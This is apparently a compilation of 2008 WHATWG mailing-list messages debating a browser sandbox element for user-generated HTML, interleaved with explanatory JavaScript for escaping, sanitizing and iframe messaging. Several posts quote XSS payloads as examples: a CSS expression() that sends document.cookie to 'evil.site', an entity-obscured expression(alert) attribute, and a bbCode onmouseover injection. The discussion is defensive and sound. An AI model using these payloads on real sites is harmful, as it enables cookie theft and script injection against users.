At first, I had no idea what that script was trying to do. But AFAICT, you were trying to use this regex: /<[^>]*>/g, which would theoretically match <foo>. But, in this context, even with the corrected regex, the script is entirely useless. It wouldn't work, for example, with <foo bar=">" baz="xxx">. It also fails because the inner HTML that you're running the regex on is supposed to have all < and > escaped, and so nothing would be matched anyway.

> A problem with this approach is that developers might forget to escape tags, therefore I think browsers should display a security warning message if the character < or > is encountered
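The cross-document messaging approach to iframe heights mentioned above could look roughly like the following. This is only a sketch, not something posted in the thread: the function names, the "frame-height" message shape, the 10000 pixel cap and the example origins are all assumptions made for illustration. The only browser API relied on is postMessage together with the origin, source and data fields of the message event.

```javascript
// Runs inside the framed comment page: report the document height to the parent.
// parentOrigin is the origin of the embedding page (assumed to be known in advance).
function reportHeight(parentWindow, doc, parentOrigin) {
  const height = doc.documentElement.scrollHeight;
  const message = JSON.stringify({ type: "frame-height", height: height });
  parentWindow.postMessage(message, parentOrigin);
}

// Runs in the parent page: resize the iframe only if the message comes from
// the expected origin and from that iframe's own window.
function applyHeight(event, iframe, trustedOrigin) {
  if (event.origin !== trustedOrigin) return false;
  if (event.source !== iframe.contentWindow) return false;

  let message;
  try {
    message = JSON.parse(event.data);
  } catch (e) {
    return false; // not JSON, ignore
  }
  if (!message || message.type !== "frame-height") return false;

  const height = Number(message.height);
  // Hypothetical sanity limit so a hostile frame cannot request an absurd size.
  if (!Number.isFinite(height) || height <= 0 || height > 10000) return false;

  iframe.style.height = Math.ceil(height) + "px";
  return true;
}
```

In a page this would be wired up with something like window.addEventListener("message", function (e) { applyHeight(e, frame, "https://comments.example"); }) in the parent and reportHeight(window.parent, document, "https://blog.example") in the framed page. Browsers without cross-document messaging would still need the fixed minimum height described above.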
Re: [whatwg] Sandboxing to accommodate user generated content.
This particular explanation is irrelevant to the topic because sandboxed fragments can contain scripts, whether within CSS or not. The idea of sandboxing is to disable scripts, not to purge them.

Chris

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

> 1. Please elaborate how an extension of CSS would require a sanitizer update.

In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a whitelist, which allows only certain tags and attributes. Among the allowed attributes are colspan, rowspan and style, since the web developer wants users to be able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is released, and it introduces a new invention: CSS expressions. Suddenly the formerly secure web application is no longer secure. A user adds the following code, and it passes the sanitizer easily:

    <span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other brilliant inventions in the future which will break sanitizers. Of course we can't know today which inventions, but sandboxing means that browser vendors can prevent the above scenario in the future.
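For comparison with the 1998 scenario above, here is a minimal sketch of the stricter kind of whitelist suggested elsewhere in this thread, one that lists safe style properties and the values each may take rather than allowing the style attribute wholesale. The property table and the function name are hypothetical and deliberately tiny; a real sanitizer would also need a proper HTML parser and serialiser around it.

```javascript
// Hypothetical allow-list: property name -> pattern its whole value must match.
const ALLOWED_STYLE = {
  "color": /^(?:[a-z]+|#[0-9a-f]{3}|#[0-9a-f]{6})$/i,
  "width": /^\d+(?:px|em|%)$/,
  "text-align": /^(?:left|right|center|justify)$/,
};

// Keep only declarations whose property is listed and whose value matches.
// Everything else, including syntax invented after this code was written,
// is dropped by default.
function sanitizeStyle(styleText) {
  const kept = [];
  for (const declaration of styleText.split(";")) {
    const colon = declaration.indexOf(":");
    if (colon === -1) continue;
    const property = declaration.slice(0, colon).trim().toLowerCase();
    const value = declaration.slice(colon + 1).trim();
    const known = Object.prototype.hasOwnProperty.call(ALLOWED_STYLE, property);
    if (known && ALLOWED_STYLE[property].test(value)) {
      kept.push(property + ": " + value);
    }
  }
  return kept.join("; ");
}
```

With this table the width declaration from the example is discarded because expression(...) is not a plain length, while color: blue survives. The sketch only shows the forbid-by-default idea; it says nothing about parser quirks in individual browsers, which is the other half of the argument in this thread.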
Re: [whatwg] Sandboxing to accommodate user generated content.
>> I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly.
>>
>> My main arguments for having this feature (in one form or another) in the browser are:
>>
>> - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated.
>
> If the sanitiser uses a whitelist-based approach that forbids everything by default, and then only allows known elements and attributes (and, in the case of the style attribute, known properties and values that are safe), then that would also be the case.

I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example:

    <div colspan=&amp; style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41 colspan=&amp;>Red</div>

The proof that sanitizing HTML is difficult is the fact that no major site even attempts it. Even Wikipedia uses some obscure wiki language instead of implementing a wysiwyg editor.

> Note that sandboxing doesn't entirely remove the need for sanitising user generated content on the server; it's just an extra line of defence in case something slips through.

Of course. However, the sandbox feature in the browser will be fail-safe if user generated content is escaped with &lt; and &gt; before being sent to the browser - as long as the browser does not have bugs, of course.

>> The suggested solution of using an attribute on an iframe element for storing the user generated content has several problems:
>>
>> 1: The use of src= as a fallback means that style information will be lost and stylesheets must be loaded again.
>
> This is not a major problem. If it uses the same stylesheet, which can be cached by the browser, then at worst it results in a 304 Not Modified response.

Many small rivers...

>> 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.
>
> In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceful degradation.

That is much more difficult to implement than a <sandbox></sandbox> mechanism, and I do not see the point of giving more work to web developers when it could be fixed so easily.

>> 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations.
>
> You could always concatenate all of the comments into a single file, reducing it down to 1 request.

No, you could not, if you for example want people to report comments or give them votes - which in the Web 2.0 world requires scripting.

>> 4: For the fallback method of using src= for HTML 4 browsers to actually work, the fallback documents must be hosted on a separate domain name. This again means that a website using HTTPS must purchase and maintain two certificates.
>
> I don't see that as a show stopper.

Well, I am not going to argue anymore. I have not heard anybody talk in favour of a sandbox mechanism here or contribute something constructive. The only feedback has been that you could do it with iframes, and that if it looks ugly in HTML 4 browsers, then that is only graceful degradation, so it is okay. Maybe the future is Flash and Silverlight after all. We'll see.

>> If HTML 5 browsers require everything between <htmlarea></htmlarea> to be html entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.
>
> Draconian error handling is something we really want to avoid, particularly when such an error can be triggered by failing to handle user generated content properly.

I see that argument. Maybe you have a suggestion as to what should happen if unescaped HTML is encountered, then?

>> HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4
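The entity-obscured div example above shows one reason hand-written filters are fragile: the text has to be looked at the way a lenient browser would read it, including character references with the trailing semicolon missing. As a rough illustration only (the function name is made up, and named references such as &quot; or &amp; are deliberately not handled), numeric references could be decoded before any whitelist check is applied:

```javascript
// Decode numeric character references such as &#40; &#x28; and, like lenient
// browsers, also the semicolon-less form &#40. Named references are left as-is.
function decodeNumericReferences(text) {
  return text.replace(/&#(?:x([0-9a-f]+)|(\d+));?/gi, function (match, hex, dec) {
    const codePoint = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // Leave out-of-range references untouched instead of throwing.
    return codePoint <= 0x10ffff ? String.fromCodePoint(codePoint) : match;
  });
}
```

Applied to the style value from the example, font-family&#61;expression&#40;alert&#40 becomes font-family=expression(alert(, which a value whitelist can then reject. This is one normalisation step among many that a sanitizer would need, not a complete defence.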
Re: [whatwg] Sandboxing to accommodate user generated content.
The problem with the tag warning is that, if </data> is the first token inserted, there will be no warning because the resulting code will be valid. So the key question remains: how do you tell an unescaped </data> from the closing </data>? And the warning, if applicable, will go to the wrong person: to all readers instead of just one writer.

What is invalid about <img alt=">" src="next.png">?

It is not enough to scratch some JavaScript that will look all right and correctly sift out plain text for some test cases; you would have to prove that it does the right thing in all cases.

Contrary to what you say, MediaWiki sanitizes HTML. You can contribute to Wikipedia without using their templates; the templates are there just to make contributing easier.

It should be possible to keep all contributed content in one file with units identified as document fragments. You still have one request per unit but all of them request the same data file.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Wednesday, June 18, 2008 12:12 AM
To: Lachlan Hunt
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

>> I have been reading up on past discussions on sandboxing content, and I feel that it is generally agreed on that there should be some mechanism for marking content as user generated. The discussion mainly appears to be focused on implementation. Please read my implementation notes at the end of this message on how we can include this function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 browsers to function properly.
>>
>> My main arguments for having this feature (in one form or another) in the browser are:
>>
>> - It is future proof. Changes to browsers (for example adding expression support to css) will never again require old sanitizers to be updated.
>
> If the sanitiser uses a whitelist-based approach that forbids everything by default, and then only allows known elements and attributes (and, in the case of the style attribute, known properties and values that are safe), then that would also be the case.

I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example:

    <div colspan=&amp; style=font-family&#61;expression&#40;alert&#40&quot;hacked&quot&#41&#41 colspan=&amp;>Red</div>

The proof that sanitizing HTML is difficult is the fact that no major site even attempts it. Even Wikipedia uses some obscure wiki language instead of implementing a wysiwyg editor.

[snip]

>> 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content.
>
> In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceful degradation.

That is much more difficult to implement than a <sandbox></sandbox> mechanism, and I do not see the point of giving more work to web developers when it could be fixed so easily.

>> 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations.
>
> You could always concatenate all of the comments into a single file, reducing it down to 1 request.

No, you could not, if you for example want people to report comments or give them votes - which in the Web 2.0 world requires scripting.

[snip]

>> If HTML 5 browsers require everything between <htmlarea></htmlarea> to be html entity escaped, that is, < and > must be replaced with &lt; and &gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn.
>
> Draconian error handling is something we really want to avoid, particularly when such an error can be triggered by failing to handle user generated content properly.

I see that argument. Maybe you have a suggestion as to what should happen if unescaped HTML is encountered, then?

>> HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.
>
> In a separate mail, you wrote:
>
>> <data> &lt;user supplied input&gt; </data>
>>
>> Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4 browsers will display html, while HTML 5 browsers will display correctly formatted code. A simple
[whatwg] Sandboxing to accommodate user generated content.
Hi!

I am a new member of this mailing list, and I wish to contribute a couple of specific requirements that I believe should be discussed and perhaps implemented in the final specification. I am unsure if this is the correct place to post my ideas (or if my ideas are even new), but if it is not, then I am sure somebody will instruct me. :)

One person told me that the specification was finished and no new features would be added from now on - but hopefully that is not true.

The challenge:

More and more websites have features where users can contribute user generated content - often in the form of audio, video, images or wiki articles. An older type of content contribution is normal text such as posts in a discussion forum, a mailing list such as this, and comments on blog articles.

A major challenge for many web developers is validating untrusted content such as the message body of a blog comment. Unless the developer has a flawless and future-proof algorithm for ensuring that the message body does not contain any script, web developers have to resort to text only - or to bbCode-style markup languages to allow users to post text content with richer formatting.

If the developer wants to enable rich formatting using bbCode, he also needs fairly advanced methods of ensuring that no scripts are executed. Consider this bbCode example: [img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser must ensure that there is absolutely no method of injecting scripts in user posts - and that is very difficult when, at the same time, parsing errors exist in browsers. The example could easily be validated by not allowing apostrophes or quotation marks in urls - but then we have multiple entities that could be used: &apos; or &#39;. To make matters worse, some browsers parse &#39, which is an incomplete html entity, and all these variations must be considered by the bbCode parser author.

Another problem which makes future-proofing this type of security difficult is that standards evolve. A few years ago you could safely allow users to apply css styles to tags. The example bbCode tag [color=blue]Blue text[/color] would be translated to <span style='color: blue'>Blue text</span>. In this example an exploit could be [color=expression(maliciousCode())]Text[/color]. When the algorithm was made, it was considered secure, since no script could ever be executed inside a style attribute. With the invention of expressions, behaviours etc., the knowledge required of web developers is ever increasing, and web developers have to review all old code whenever new technologies emerge - because what once was secure is suddenly not secure anymore.

One solution:

    <htmlarea>User generated content</htmlarea>

No scripts would ever be allowed to be executed inside this tag. Malicious users could potentially submit </htmlarea> unsafe content <htmlarea> and get around this. There are, as I see it, two solutions to this: user generated content inside the tag must be escaped using html entities (but still rendered as html by the user agent), or the author must prevent users from submitting the string </htmlarea> and all possible variations of the tag. If the first solution is used, then browsers should display a strong security warning if unescaped content is seen between htmlarea tags on a website (to educate web developers).

A sidenote: The tag name I chose is based on the textarea tag, whose content should also be entity escaped to prevent users from inserting the text </textarea>. This currently breaks a lot of web pages - so perhaps a strong security warning is in place if unescaped content is found after the textarea start tag also?

--
Best regards
Frode Børli
Seria.no
Mobile: +47 406 16 637
Company: +47 216 90 000
Fax: +47 216 91 000
Think about the environment. Do not print this e-mail unless you really need to.
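The first of the two options described in the message, entity escaping the user content before it is placed between the tags, might be sketched on the server side as follows. Note that htmlarea is only the element proposed in this message, not an existing HTML element, and both function names are invented for this illustration.

```javascript
// Characters that must not reach the page unescaped, and their replacements.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every markup-significant character with its entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, function (ch) { return ENTITIES[ch]; });
}

// Wrap escaped user content in the (hypothetical) htmlarea element.
function wrapUserContent(text) {
  return "<htmlarea>" + escapeHtml(text) + "</htmlarea>";
}
```

Because every < in the user content becomes &lt;, a submitted </htmlarea> can no longer close the element early, which is the attack described above. A browser that does not know the element would simply show the escaped markup as text.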